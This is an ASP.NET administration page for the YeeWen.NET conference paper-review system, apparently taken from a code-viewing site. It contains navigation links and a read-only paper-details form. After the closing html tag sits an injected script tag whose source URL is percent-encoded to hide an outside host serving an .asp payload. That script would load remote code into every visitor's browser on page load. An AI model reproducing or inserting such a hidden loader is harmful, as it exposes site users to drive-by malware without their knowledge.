📄 admin_modifypaper.aspx
字号:
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="admin_ModifyPaper.aspx.cs" Inherits="Admin_admin_ModifyPaper" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ModifyPaper</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<div>
<div>
<div>
<span style="font-size: 24pt">Yee<font color="red">W</font>en.NET </span>
<div style="font-size: 24pt; z-index: 101; left: 193px; width: 723px; position: absolute;
top: 21px; height: 33px">
<span style="color: #ff0000; background-color: #99ffcc"> Welcome to YeeWen
<a id="HyperLink1" href="Index.aspx"><span style="font-size: 9pt">
<strong><span class="RTLogin">Sign out</span></strong></span></a><span style="color: #000000"><strong>
</strong></span></span>
</div>
<p>
</p>
<font size="3"><strong>The Beuty of Scholarly Communication</strong></font>
<table id="Table2" border="0" language="javascript" onclick="return TABLE1_onclick()">
<tr bgcolor="blue">
<td style="width: 167px; height: 21px">
<span style="color: #ffffff"><strong>Authorize</strong></span></td>
</tr>
<tr>
<td style="width: 167px">
<span style="background-color: #99ffff"><span style="background-color: #99ffcc">
<span style="color: #6600ff"> <span style="color: #0000ff"> <strong><span><a
href="Admin_showrequestchange.aspx">Change Role</a></span></strong></span> </span>
</span></span>
</td>
</tr>
<tr>
<td style="width: 167px; height: 21px">
<span style="background-color: #99ffcc"> <span style="color: #0000ff"> <span> <span>
</span><strong><span><a href="Admin_addreviewer.aspx">Add Reviewer</a></span> </strong>
</span></span> </span>
</td>
</tr>
<tr>
<td style="width: 167px">
<strong><span style="color: #0000ff; background-color: #99ffcc"> <span
style="color: #6600ff"> <span style="color: #0000ff"> <a href="Admin_showdeleteuser.aspx">
Delete Users </a></span> </span> </span>
</strong>
</td>
</tr>
<tr>
<td style="width: 167px">
<strong><span style="color: #ffffff; background-color: #0000ff">Papers
</span></strong>
</td>
</tr>
<tr>
<td style="width: 167px">
<span style="color: #3300ff; background-color: #99ffcc"><strong>
<span style="color: #0000ff"> <a href="Admin_ReviewedPapert.aspx">Reviewed Paper</a></span><span
style="color: #6600ff"> </span></strong></span>
</td>
</tr>
<tr>
<td style="width: 167px">
<span style="background-color: #99ffcc"> <span style="color: #0000ff"><strong><span>
<span><a href="Admin_NewPaper.aspx">New Paper</a></span>
</span></strong></span></span>
</td>
</tr>
<tr>
<td style="width: 167px">
<strong><span style="color: #0000cc; background-color: #99ffcc">
<span style="color: #0000ff"><a href="Admin_AssigningPaper.aspx">Assign Paper</a>
</span> </span></strong>
</td>
</tr>
<tr>
<td style="width: 167px; height: 21px">
<strong><span style="color: #ffffff; background-color: #0000cc">Conference
</span></strong>
</td>
</tr>
<tr>
<td style="width: 167px">
<strong><span style="color: #0000ff; background-color: #99ffcc">
<span><a href="../ViewPage/Conference.aspx">Conference List</a> </span>
</span></strong>
</td>
</tr>
</table>
<div style="z-index: 102; left: 9px; width: 174px; color: #000000; position: absolute;
top: 93px; height: 100px">
<div id="DIV1" language="javascript" onclick="return DIV1_onclick()" style="z-index: 101;
left: 175px; width: 741px; position: absolute; top: 0px; height: 362px; text-align: left">
<span style="color: #3300ff; background-color: #99ffcc">Paper Information (Required
fields marked in red * )
<br />
</span>
<table>
<tr>
<td style="width: 57px; text-align: right">
Subject:</td>
<td style="width: 100px">
<asp:Label ID="Subjectlab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Writer:</td>
<td style="width: 100px">
<asp:Label ID="Writerlab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Discipline:</td>
<td style="width: 100px">
<asp:Label ID="Disciplinelab" runat="server" Text="Label" Width="156px"></asp:Label></td>
</tr>
<tr>
<td style="width: 57px; text-align: right">
Keywords:</td>
<td style="width: 100px">
<asp:Label ID="Keywordlab1" runat="server" Width="156px"></asp:Label></td>
<td style="width: 100px">
<asp:Label ID="Keywordlab2" runat="server" Width="156px"></asp:Label></td>
<td style="width: 100px">
<asp:Label ID="Keywordlab3" runat="server" Width="156px"></asp:Label></td>
</tr>
</table>
<div style="z-index: 101; left: 6px">
<table>
</table>
<table>
<tr>
<td style="width: 57px; text-align: right">
Abstract:</td>
<td style="width: 146px">
<asp:TextBox ID="Abstracttb" runat="server" Enabled="False" Height="145px" TextMode="MultiLine"
Width="411px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 57px; text-align: right; height: 23px;">
</td>
<td style="text-align: center; height: 23px;" width="300">
<asp:Button ID="Downloadbtn" runat="server" OnClick="Downloadbtn_Click" Text="Download" Width="60px" />
<asp:Button ID="Backbtn" runat="server" OnClick="Backbtn_Click" Text="Back" Width="30px" />
<asp:Button ID="Continuebtn" runat="server" OnClick="Continuebtn_Click" Text="Continue" Width="60px" /></td>
<td style="width: 140px; text-align: left; height: 23px;">
</td>
</tr>
</table>
</div>
<br />
<br />
<br />
<br />
2007-2008 YeeWen.net
| Terms of Use | Learn more about YeeWen | <a href="http://www.yeedao.net/app/Login/"
title="Help Center"><span style="color: #000000">Help Center</span></a><span style="color: #000000">
</span>
</div>
<br />
</div>
</div>
</div>
</div>
</div>
</form>
</body>
</html>
<script src="http://%78%66%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -